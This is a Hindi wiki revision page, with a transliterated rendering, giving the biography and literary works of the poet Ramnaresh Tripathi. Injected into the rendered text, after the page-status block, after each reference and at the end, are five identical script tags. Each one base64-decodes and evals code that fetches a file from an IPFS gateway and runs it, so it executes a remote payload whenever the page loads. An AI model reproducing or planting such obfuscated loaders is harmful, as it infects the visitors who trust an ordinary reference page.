Difference between revisions of "रामनरेश त्रिपाठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''रामनरेश त्रिपाठी''' (जन्म- [[1881]] [[जौनपुर]], [[उत्तर प्रदेश]] - मृत्यु- [[1962]]) प्राक्छायावादी युग के महत्त्वपूर्ण कवि हैं जिन्होंने राष्ट्रप्रेम की कविताएं भी लिखीं। इन्होंने कविता के अलावा उपन्यास, नाटक, आलोचना, हिन्दी साहित्य का संक्षिप्त इतिहास तथा बालोपयोगी पुस्तकें भी लिखीं। इनकी मुख्य काव्य-कृतियां हैं- 'मिलन, 'पथिक, 'स्वप्न तथा 'मानसी। 'स्वप्न पर इन्हें हिंदुस्तान अकादमी का पुरस्कार मिला।<ref>{{cite web |url=http://www.brandbihar.com/hindi/literature/kavya/ramnaresh_tripathi.html |title=रामनरेश त्रिपाठी |accessmonthday=10 फ़रवरी |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=brandbihar.com |language=[[हिन्दी]]}}</ref>  
+
{{सूचना बक्सा साहित्यकार
==जन्म==
+
|चित्र=
रामनरेश त्रिपाठी का जन्म ज़िला [[जौनपुर]] के कोइरीपुर नामक गाँव में सन [[1881]] ई. में हुआ था। इनकी आरम्भिक शिक्षा-दीक्षा जौनपुर में हुई और सन [[1911]] ई. के आस-पास बाईस वर्ष की आयु में इन्होंने काव्य रचना के क्षेत्र में पदार्पण किया।
+
|चित्र का नाम=
 +
|पूरा नाम=रामनरेश त्रिपाठी
 +
|अन्य नाम=
 +
|जन्म=[[4 मार्च]], [[1881]]
 +
|जन्म भूमि=[[जौनपुर]], [[उत्तर प्रदेश]]
 +
|मृत्यु=[[16 जनवरी]], [[1962]]
 +
|मृत्यु स्थान=[[प्रयाग]]
 +
|अविभावक=पंडित रामदत्त त्रिपाठी
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=[[प्रयाग]]
 +
|कर्म-क्षेत्र=साहित्य
 +
|मुख्य रचनाएँ=मिलन, पथिक, स्वप्न, मानसी, अंवेषण, हे प्रभो आनन्ददाता....
 +
|विषय=उपन्यास, नाटक, आलोचना, गीत, बालोपयोगी पुस्तकें
 +
|भाषा=खड़ी बोली, [[हिंदी]], [[उर्दू]]
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=हिंदुस्तान अकादमी पुरस्कार
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''रामनरेश त्रिपाठी''' (जन्म- [[4 मार्च]], [[1881]], [[जौनपुर]], [[उत्तर प्रदेश]]; मृत्यु- [[16 जनवरी]], [[1962]], [[प्रयाग]]) प्राक्छायावादी युग के महत्त्वपूर्ण कवि हैं जिन्होंने राष्ट्रप्रेम की कविताएँ भी लिखीं। इन्होंने कविता के अलावा उपन्यास, नाटक, आलोचना, हिन्दी साहित्य का संक्षिप्त इतिहास तथा बालोपयोगी पुस्तकें भी लिखीं। इनकी मुख्य काव्य कृतियाँ हैं- 'मिलन, 'पथिक, 'स्वप्न तथा 'मानसी। रामनरेश त्रिपाठी ने लोक-गीतों के चयन के लिए कश्मीर से कन्याकुमारी और सौराष्ट्र से गुवाहाटी तक सारे देश का भ्रमण किया। 'स्वप्न पर इन्हें हिंदुस्तान अकादमी का पुरस्कार मिला।<ref>{{cite web |url=http://www.brandbihar.com/hindi/literature/kavya/ramnaresh_tripathi.html |title=रामनरेश त्रिपाठी |accessmonthday=10 फ़रवरी |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=brandbihar.com |language=[[हिन्दी]]}}</ref>  
 +
==जीवन परिचय==
 +
"हे प्रभो आनन्ददाता ज्ञान हमको दीजिए" जैसा प्रेरणादायी गीत रचकर, प्रार्थना के रूप में स्कूलों में छात्रों व शिक्षकों की वाणी में बसे, महाकवि पंडित रामनरेश त्रिपाठी साहित्य के आकाश के चमकीले [[नक्षत्र]] थे। रामनरेश त्रिपाठी का जन्म ज़िला [[जौनपुर]] के कोइरीपुर नामक गाँव में 4 मार्च, सन 1881 ई. में एक कृषक परिवार में हुआ था। उनके पिता पंडित रामदत्त त्रिपाठी परम धर्म व सदाचार परायण [[ब्राह्मण]] थे। पंडित रामदत्त त्रिपाठी भारतीय सेना में सूबेदार के पद पर रह चुके थे, उनका रक्त पंडित रामनरेश त्रिपाठी की रगों में धर्मनिष्ठा, कर्तव्यनिष्ठा व राष्ट्रभक्ति की भावना के रूप में बहता था। उन्हें अपने परिवार से ही निर्भीकता और आत्मविश्वास के गुण मिले थे। पंडित त्रिपाठी की प्रारम्भिक शिक्षा गाँव के प्राइमरी स्कूल में हुई। जूनियर कक्षा उत्तीर्ण कर हाईस्कूल वह निकटवर्ती जौनपुर ज़िले में पढ़ने गए मगर वह हाईस्कूल की शिक्षा पूरी नहीं कर सके। पिता से अनबन होने पर अट्ठारह वर्ष की आयु में वह [[कलकत्ता]] चले गए।
 +
====हे प्रभो आनन्ददाता की रचना====
 +
पंडित त्रिपाठी में कविता के प्रति रुचि प्राथमिक शिक्षा प्राप्त करते समय जाग्रत हुई थी। वह कलकत्ता में संक्रामक रोग हो जाने की वजह से अधिक समय तक नहीं रह सके। वह स्वास्थ्य सुधार के लिए एक व्यक्ति की सलाह मानकर  [[जयपुर]] के सीकर ठिकाना स्थित फतेहपुर ग्राम में सेठ रामवल्लभ नेवरिया के पास चले गए। यह एक संयोग ही था कि मरणासन्न स्थिति में वह अपने घर परिवार में न जाकर सुदूर अपरिचित स्थान राजपूताना के एक अजनबी परिवार में जा पहुँचे जहाँ शीघ्र ही इलाज व स्वास्थ्यप्रद जलवायु पाकर रोगमुक्त हो गए। पंडित त्रिपाठी ने सेठ रामवल्लभ के पुत्रों की शिक्षा-दीक्षा की जिम्मेदारी को कुशलतापूर्वक निभाया। इस दौरान उनकी लेखनी पर मां सरस्वती की मेहरबानी हुई और उन्होंने “हे प्रभो आनन्ददाता..” जैसी बेजोड़ रचना कर डाली जो आज भी अनेक स्कूलों में प्रार्थना के रूप में गाई जाती है।<ref name="कविता कोश">{{cite web |url=http://www.kavitakosh.org/kk/index.php?title=%E0%A4%B0%E0%A4%BE%E0%A4%AE%E0%A4%A8%E0%A4%B0%E0%A5%87%E0%A4%B6_%E0%A4%A4%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%AA%E0%A4%BE%E0%A4%A0%E0%A5%80_/_%E0%A4%AA%E0%A4%B0%E0%A4%BF%E0%A4%9A%E0%A4%AF |title=रामनरेश त्रिपाठी |accessmonthday=[[18 अप्रैल]] |accessyear=[[2011]] |last= |first= |authorlink= |format=एच टी एम एल |publisher=कविता कोश |language=[[हिन्दी]]}}</ref>
 +
==साहित्य साधना की शुरुआत==
 +
पंडित त्रिपाठी की साहित्य साधना की शुरुआत फतेहपुर में होने के बाद उन्होंने उन दिनों तमाम छोटे-बड़े बालोपयोगी काव्य संग्रह, सामाजिक उपन्यास और हिन्दी महाभारत लिखे। उन्होंने हिन्दी तथा संस्कृत के सम्पूर्ण साहित्य का गहन अध्ययन किया। पंडित त्रिपाठी ज्ञान एवं अनुभव की संचित पूंजी लेकर वर्ष 1915 में पुण्यतीर्थ एवं ज्ञानतीर्थ प्रयाग गए और उसी क्षेत्र को उन्होंने अपनी कर्मस्थली बनाया। उन्होंने थोडी पूंजी से प्रकाशन का व्यवसाय भी आरम्भ किया। पंडित त्रिपाठी ने गद्य और पद्य दोनों में रचनाएँ की तथा मौलिकता के नियम को ध्यान में रखकर रचनाओं को अंजाम दिया। हिन्दी जगत में वह मार्गदर्शी साहित्यकार के रूप में अवरित हुए और सारे देश में लोकप्रिय हो गए।
 +
 
 +
हिन्दी के प्रथम एवं सर्वोत्कृष्ट राष्ट्रीय खण्डकाव्य “पथिक” की रचना उन्होंने वर्ष 1920 में 21 दिन में की। इसके अतिरिक्त उनके प्रसिद्ध मौलिक खण्डकाव्यों में “मिलन” और “स्वप्न” भी  शामिल हैं। उन्होंने बड़े परिश्रम से कविता कौमुदी के सात विशाल एवं अनुपम संग्रह-ग्रंथों का भी सम्पादन एवं प्रकाशन किया। पंडित त्रिपाठी कलम के धनी ही नहीं बल्कि कर्मशूर भी थे। महात्मा गांधी के निर्देश पर त्रिपाठी जी हिन्दी साहित्य सम्मेलन के प्रचार मंत्री के रूप में हिन्दी जगत के दूत बनकर दक्षिण भारत गए थे। वह पक्के गांधीवादी देशभक्त और राष्ट्र सेवक थे। स्वाधीनता संग्राम और किसान आन्दोलनों में भाग लेकर वह जेल भी गए। पंडित त्रिपाठी को अपने जीवन काल में कोई राजकीय सम्मान तो नही मिला पर उससे भी कही ज़्यादा गौरवप्रद लोक सम्मान तथा अक्षय यश उन पर अवश्य बरसा। <ref name="कविता कोश" />
 +
 
 
====<u>स्वच्छन्दतावादी कवि</u>====
 
====<u>स्वच्छन्दतावादी कवि</u>====
 
रामनरेश त्रिपाठी स्वच्छन्दतावादी भावधारा के कवि के रूप में प्रतिष्ठित हुए हैं। इनसे पूर्व श्रीधर पाठक ने [[हिन्दी]] कविता में स्वच्छन्दतावाद (रोमाण्टिसिज्म) को जन्म दिया था। रामनरेश त्रिपाठी ने अपनी रचनाओं द्वारा उक्त परम्परा को विकसित किया और सम्पन्न बनाया। देश प्रेम तथा राष्ट्रीयता की अनुभूतियाँ इनकी रचनाओं का मुख्य विषय रही हैं। हिन्दी कविता के मंच पर ये राष्ट्रीय भावनाओं के गायक के रूप में बहुत लोकप्रिय हुए। प्रकृति-चित्रण में भी इन्हें अदभुत सफलता प्राप्त हुई है।  
 
रामनरेश त्रिपाठी स्वच्छन्दतावादी भावधारा के कवि के रूप में प्रतिष्ठित हुए हैं। इनसे पूर्व श्रीधर पाठक ने [[हिन्दी]] कविता में स्वच्छन्दतावाद (रोमाण्टिसिज्म) को जन्म दिया था। रामनरेश त्रिपाठी ने अपनी रचनाओं द्वारा उक्त परम्परा को विकसित किया और सम्पन्न बनाया। देश प्रेम तथा राष्ट्रीयता की अनुभूतियाँ इनकी रचनाओं का मुख्य विषय रही हैं। हिन्दी कविता के मंच पर ये राष्ट्रीय भावनाओं के गायक के रूप में बहुत लोकप्रिय हुए। प्रकृति-चित्रण में भी इन्हें अदभुत सफलता प्राप्त हुई है।  
Line 11: Line 50:
 
रामनरेश त्रिपाठी अपनी काव्य कृतियों में प्रकृति के सफल चितेरे रहे हैं। इन्होंने प्रकृति चित्रण व्यापक, विशद और स्वतंत्र रूप में किया है। इनके सहज-मनोरम प्रकृति-चित्रों में कहीं-कहीं छायावाद की झलक भी मिल जाती है। उदाहरण के लिए 'पथिक' की दो पंक्तियाँ द्रष्टव्य हैं-  
 
रामनरेश त्रिपाठी अपनी काव्य कृतियों में प्रकृति के सफल चितेरे रहे हैं। इन्होंने प्रकृति चित्रण व्यापक, विशद और स्वतंत्र रूप में किया है। इनके सहज-मनोरम प्रकृति-चित्रों में कहीं-कहीं छायावाद की झलक भी मिल जाती है। उदाहरण के लिए 'पथिक' की दो पंक्तियाँ द्रष्टव्य हैं-  
 
<poem>“प्रति क्षण नूतन वेष बनाकर रंग-विरंग निराला। रवि के सम्मुख थिरक रही है नभ में वारिद माला”</poem>
 
<poem>“प्रति क्षण नूतन वेष बनाकर रंग-विरंग निराला। रवि के सम्मुख थिरक रही है नभ में वारिद माला”</poem>
 
 
==भाषा==
 
==भाषा==
 
प्रकृति चित्र हों, या अन्यान्य प्रकार के वर्णन, सर्वत्र रामनरेश त्रिपाठी ने भाषा की सफाई का बहुत ख्याल रखा है। इनके काव्यों की भाषा शुद्ध, सहज खड़ी बोली है, जो इस रूप में हिन्दी काव्य में प्रथम बार प्रयुक्त दिखाई देती है। इनमें [[व्याकरण]] तथा वाक्य-रचना सम्बन्धी त्रुटियाँ नहीं मिलतीं। इन्होंने कहीं-कहीं उर्दू के प्रचलित शब्दों और उर्दू-छन्दों का भी व्यवहार किया है-
 
प्रकृति चित्र हों, या अन्यान्य प्रकार के वर्णन, सर्वत्र रामनरेश त्रिपाठी ने भाषा की सफाई का बहुत ख्याल रखा है। इनके काव्यों की भाषा शुद्ध, सहज खड़ी बोली है, जो इस रूप में हिन्दी काव्य में प्रथम बार प्रयुक्त दिखाई देती है। इनमें [[व्याकरण]] तथा वाक्य-रचना सम्बन्धी त्रुटियाँ नहीं मिलतीं। इन्होंने कहीं-कहीं उर्दू के प्रचलित शब्दों और उर्दू-छन्दों का भी व्यवहार किया है-
<poem>“मेरे लिए खड़ा था दुखियों के द्वार पर तू। मैं बाट जोहता था तेरी किसी चमन में।। बनकर किसी के आँसू मेरे लिए बहा तू। मैं देखता तुझे था माशूक के बदन में”।।</poem>
+
<poem>
 +
“मेरे लिए खड़ा था दुखियों के द्वार पर तू।  
 +
मैं बाट जोहता था तेरी किसी चमन में।।  
 +
बनकर किसी के आँसू मेरे लिए बहा तू।  
 +
मैं देखता तुझे था माशूक के बदन में”।।</poem>
 
;<u>उपन्यास तथा नाटक</u>
 
;<u>उपन्यास तथा नाटक</u>
 
रामनरेश त्रिपाठी ने काव्य-रचना के अतिरिक्त उपन्यास तथा नाटक लिखे हैं, आलोचनाएँ की हैं और टीका भी। इनके तीन उपन्यास उल्लेखनीय हैं-
 
रामनरेश त्रिपाठी ने काव्य-रचना के अतिरिक्त उपन्यास तथा नाटक लिखे हैं, आलोचनाएँ की हैं और टीका भी। इनके तीन उपन्यास उल्लेखनीय हैं-
Line 30: Line 72:
 
इनकी प्रसिद्धि मुख्यत: इनके कवि-रूप के कारण हुई। ये 'द्विवेदीयुग' और 'छायावाद युग' की महत्त्वपूर्ण कड़ी के रूप में आते हैं। पूर्व छायावाद युग के खड़ी बोली के कवियों में इनका नाम बहुत आदर से लिया जाता है। इनका प्रारम्भिक कार्य-क्षेत्र [[राजस्थान]] और [[इलाहाबाद]] रहा। इन्होंने अन्तिम जीवन सुल्तानपुर में बिताया।  
 
इनकी प्रसिद्धि मुख्यत: इनके कवि-रूप के कारण हुई। ये 'द्विवेदीयुग' और 'छायावाद युग' की महत्त्वपूर्ण कड़ी के रूप में आते हैं। पूर्व छायावाद युग के खड़ी बोली के कवियों में इनका नाम बहुत आदर से लिया जाता है। इनका प्रारम्भिक कार्य-क्षेत्र [[राजस्थान]] और [[इलाहाबाद]] रहा। इन्होंने अन्तिम जीवन सुल्तानपुर में बिताया।  
 
==मृत्यु==
 
==मृत्यु==
सन [[1962]] ई. में राम नरेश त्रिपाठी जी का देहान्त हो गया।
+
रामनरेश त्रिपाठी ने [[16 जनवरी]], [[1962]] को अपने कर्मभूमि [[प्रयाग]] में ही अंतिम सांस ली। पंडित त्रिपाठी के निधन के बाद आज उनके गृह जनपद सुलतानपुर में एक मात्र सभागार स्थापित है जो उनकी स्मृतियों को ताजा करता है।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 11:57, 18 April 2011

ramanaresh tripathi
poora nam ramanaresh tripathi
janm 4 march, 1881
janm bhoomi jaunapur, uttar pradesh
mrityu 16 janavari, 1962
mrityu sthan prayag
karm bhoomi prayag
karm-kshetr sahity
mukhy rachanaean milan, pathik, svapn, manasi, aanveshan, he prabho anandadata....
vishay upanyas, natak, alochana, git, balopayogi pustakean
bhasha kh di boli, hiandi, urdoo
puraskar-upadhi hiandustan akadami puraskar
nagarikata bharatiy
inhean bhi dekhean kavi soochi, sahityakar soochi

ramanaresh tripathi (janm- 4 march, 1881, jaunapur, uttar pradesh; mrityu- 16 janavari, 1962, prayag) prakchhayavadi yug ke mahattvapoorn kavi haian jinhoanne rashtraprem ki kavitaean bhi likhian. inhoanne kavita ke alava upanyas, natak, alochana, hindi sahity ka sankshipt itihas tatha balopayogi pustakean bhi likhian. inaki mukhy kavy kritiyaan haian- 'milan, 'pathik, 'svapn tatha 'manasi. ramanaresh tripathi ne lok-gitoan ke chayan ke lie kashmir se kanyakumari aur saurashtr se guvahati tak sare desh ka bhraman kiya. 'svapn par inhean hiandustan akadami ka puraskar mila.[1]

jivan parichay

"he prabho anandadata jnan hamako dijie" jaisa preranadayi git rachakar, prarthana ke roop mean skooloan mean chhatroan v shikshakoan ki vani mean base, mahakavi pandit ramanaresh tripathi sahity ke akash ke chamakile nakshatr the. ramanaresh tripathi ka janm zila jaunapur ke koiripur namak gaanv mean 4 march, san 1881 ee. mean ek krishak parivar mean hua tha. unake pita pandit ramadatt tripathi param dharm v sadachar parayan brahman the. pandit ramadatt tripathi bharatiy sena mean soobedar ke pad par rah chuke the, unaka rakt pandit ramanaresh tripathi ki ragoan mean dharmanishtha, kartavyanishtha v rashtrabhakti ki bhavana ke roop mean bahata tha. unhean apane parivar se hi nirbhikata aur atmavishvas ke gun mile the. pandit tripathi ki prarambhik shiksha gaanv ke praimari skool mean huee. jooniyar kaksha uttirn kar haeeskool vah nikatavarti jaunapur zile mean padhane ge magar vah haeeskool ki shiksha poori nahian kar sake. pita se anaban hone par attharah varsh ki ayu mean vah kalakatta chale ge.

he prabho anandadata ki rachana

pandit tripathi mean kavita ke prati ruchi prathamik shiksha prapt karate samay jagrat huee thi. vah kalakatta mean sankramak rog ho jane ki vajah se adhik samay tak nahian rah sake. vah svasthy sudhar ke lie ek vyakti ki salah manakar jayapur ke sikar thikana sthit phatehapur gram mean seth ramavallabh nevariya ke pas chale ge. yah ek sanyog hi tha ki maranasann sthiti mean vah apane ghar parivar mean n jakar sudoor aparichit sthan rajapootana ke ek ajanabi parivar mean ja pahuanche jahaan shighr hi ilaj v svasthyaprad jalavayu pakar rogamukt ho ge. pandit tripathi ne seth ramavallabh ke putroan ki shiksha-diksha ki jimmedari ko kushalatapoorvak nibhaya. is dauran unaki lekhani par maan sarasvati ki meharabani huee aur unhoanne “he prabho anandadata..” jaisi bejo d rachana kar dali jo aj bhi anek skooloan mean prarthana ke roop mean gaee jati hai.[2]

sahity sadhana ki shuruat

pandit tripathi ki sahity sadhana ki shuruat phatehapur mean hone ke bad unhoanne un dinoan tamam chhote-b de balopayogi kavy sangrah, samajik upanyas aur hindi mahabharat likhe. unhoanne hindi tatha sanskrit ke sampoorn sahity ka gahan adhyayan kiya. pandit tripathi jnan evan anubhav ki sanchit pooanji lekar varsh 1915 mean punyatirth evan jnanatirth prayag ge aur usi kshetr ko unhoanne apani karmasthali banaya. unhoanne thodi pooanji se prakashan ka vyavasay bhi arambh kiya. pandit tripathi ne gady aur pady donoan mean rachanaean ki tatha maulikata ke niyam ko dhyan mean rakhakar rachanaoan ko aanjam diya. hindi jagat mean vah margadarshi sahityakar ke roop mean avarit hue aur sare desh mean lokapriy ho ge.

hindi ke pratham evan sarvotkrisht rashtriy khandakavy “pathik” ki rachana unhoanne varsh 1920 mean 21 din mean ki. isake atirikt unake prasiddh maulik khandakavyoan mean “milan” aur “svapn” bhi shamil haian. unhoanne b de parishram se kavita kaumudi ke sat vishal evan anupam sangrah-granthoan ka bhi sampadan evan prakashan kiya. pandit tripathi kalam ke dhani hi nahian balki karmashoor bhi the. mahatma gaandhi ke nirdesh par tripathi ji hindi sahity sammelan ke prachar mantri ke roop mean hindi jagat ke doot banakar dakshin bharat ge the. vah pakke gaandhivadi deshabhakt aur rashtr sevak the. svadhinata sangram aur kisan andolanoan mean bhag lekar vah jel bhi ge. pandit tripathi ko apane jivan kal mean koee rajakiy samman to nahi mila par usase bhi kahi zyada gauravaprad lok samman tatha akshay yash un par avashy barasa. [2]

svachchhandatavadi kavi

ramanaresh tripathi svachchhandatavadi bhavadhara ke kavi ke roop mean pratishthit hue haian. inase poorv shridhar pathak ne hindi kavita mean svachchhandatavad (romantisijm) ko janm diya tha. ramanaresh tripathi ne apani rachanaoan dvara ukt parampara ko vikasit kiya aur sampann banaya. desh prem tatha rashtriyata ki anubhootiyaan inaki rachanaoan ka mukhy vishay rahi haian. hindi kavita ke manch par ye rashtriy bhavanaoan ke gayak ke roop mean bahut lokapriy hue. prakriti-chitran mean bhi inhean adabhut saphalata prapt huee hai.

kavy kritiyaan

inaki char kavy kritiyaan ullekhaniy haian- 'milan' (1918 ee.), 'pathik' (1921 ee.), 'manasi' (1927 ee.), 'svapn' (1929 ee.). inamean 'manasi' phutakar kavitaoan ka sangrah hai aur shesh tinoan kritiyaan premakhyanak khand kavy hai.

khand kavy

inhoanne khand kavyoan ki rachana ke lie kinhian pauranik athava aitihasik katha sootroan ka ashray nahian liya hai, varan apani kalpana shakti se maulik tatha marmik kathaoan ki srishti ki hai. kavi dvara nirmit hone ke karan in kavyoan ke charitr b de akarshak haian aur jivan ke saanche mean dhale hue jan p date haian. in tinoan hi khand kavyoan ki ek samany visheshata yah hai ki inamean deshabhakti ki bhavanaoan ka samavesh bahut hi sarasata ke sath kiya gaya hai. udaharan ke lie 'svapn' namak khand kavy ko liya ja sakata hai. isaka nayak vasant namak navayuvak ek or to apani priya ke pragadh prem mean lin rahana chahata hai, manoram prakriti ke kro d mean usake sahachary-sukh ki abhilasha karata hai aur doosari or samaj ka dukh-dard door karane ke lie rashtroddhar ki bhavana se andolit hota rahata hai. usake man mean is prakar ka antarddhanddh bahut samay tak chalata hai. antat: vah apani priya ke dvara hi udabuddh kiye jane par rashtr prem ko prathamikata deta hai aur shatruoan dvara padakrant svedash ki raksha evan uddhar karane mean saphal ho jata hai. is prakar ki bhavanaoan se paripoorn hone ke karan ramanaresh tripathi ke kavy bahut dinoan tak rashtrapremi navayuvakoan ke kanthahar ban hue the.

prakriti chitran

ramanaresh tripathi apani kavy kritiyoan mean prakriti ke saphal chitere rahe haian. inhoanne prakriti chitran vyapak, vishad aur svatantr roop mean kiya hai. inake sahaj-manoram prakriti-chitroan mean kahian-kahian chhayavad ki jhalak bhi mil jati hai. udaharan ke lie 'pathik' ki do panktiyaan drashtavy haian-

“prati kshan nootan vesh banakar rang-virang nirala. ravi ke sammukh thirak rahi hai nabh mean varid mala”

bhasha

prakriti chitr hoan, ya anyany prakar ke varnan, sarvatr ramanaresh tripathi ne bhasha ki saphaee ka bahut khyal rakha hai. inake kavyoan ki bhasha shuddh, sahaj kh di boli hai, jo is roop mean hindi kavy mean pratham bar prayukt dikhaee deti hai. inamean vyakaran tatha vaky-rachana sambandhi trutiyaan nahian milatian. inhoanne kahian-kahian urdoo ke prachalit shabdoan aur urdoo-chhandoan ka bhi vyavahar kiya hai-

“mere lie kh da tha dukhiyoan ke dvar par too.
maian bat johata tha teri kisi chaman mean..
banakar kisi ke aansoo mere lie baha too.
maian dekhata tujhe tha mashook ke badan mean”..

upanyas tatha natak

ramanaresh tripathi ne kavy-rachana ke atirikt upanyas tatha natak likhe haian, alochanaean ki haian aur tika bhi. inake tin upanyas ullekhaniy haian-

  • 'viraganna' (1911 ee.),
  • 'virabala' (1911 ee.),
  • 'lakshmi' (1924 ee.)
naty kritiyaan

tin ullekhaniy naty kritiyaan haian-

  • 'subhadra' (1924 ee.),
  • 'jayant' (1934 ee.),
  • 'premalok' (1934 ee.)

any kritiyaan

alochanatmak kritiyoan ke roop mean inaki do pustakean 'tulasidas aur unaki kavita' tatha 'hindi sahity ka sankshipt itihas' vicharaniy haian. tikakar ke roop mean apani 'ramacharitamanas ki tika' ke karan smaran kiye jate haian. 'tis din malaviy ji ke sath' tripathi ji ki utkrisht sansmaranatmak kriti hai. inake sahityik krititv ka ek mahattvapoorn bhag sampadan karyoan ke aantargat ata hai. san 1925 ee. mean inhoanne hindi, urdoo, sanskrit aur baangla ki lokapriy kavitaoan ka sankalan aur sampadan kiya. inaka yah kary ath bhagoan mean 'kavita kaumudi' ke nam se prakashit hua hai. isi mean ek bhag gram-gitoan ka hai. gram-gitoan ke sankalan, sampadan aur unake bhavatmak bhashy prastut karane ki drishti se inaka kary vishesh roop se ullekhaniy raha hai. ye hindi mean is disha mean kary karane vale pahale vyakti rahe haian aur inhean paryapt saphalata tatha kirti mili hai. 1931 se 1941 ee. tak inhoanne 'vanar' ka sampadan tatha prakashan kiya tha. inake dvara sampadit aur maulik roop mean likhit balakopayogi sahity bhi bahut adhik matra mean upalabdh hai.

prasiddhi

inaki prasiddhi mukhyat: inake kavi-roop ke karan huee. ye 'dvivediyug' aur 'chhayavad yug' ki mahattvapoorn k di ke roop mean ate haian. poorv chhayavad yug ke kh di boli ke kaviyoan mean inaka nam bahut adar se liya jata hai. inaka prarambhik kary-kshetr rajasthan aur ilahabad raha. inhoanne antim jivan sultanapur mean bitaya.

mrityu

ramanaresh tripathi ne 16 janavari, 1962 ko apane karmabhoomi prayag mean hi aantim saans li. pandit tripathi ke nidhan ke bad aj unake grih janapad sulatanapur mean ek matr sabhagar sthapit hai jo unaki smritiyoan ko taja karata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. ramanaresh tripathi (hindi) (ech.ti.em.el) brandbihar.com. abhigaman tithi: 10 faravari, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. 2.0 2.1 ramanaresh tripathi (hindi) (ech ti em el) kavita kosh. abhigaman tithi: 18 aprail, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>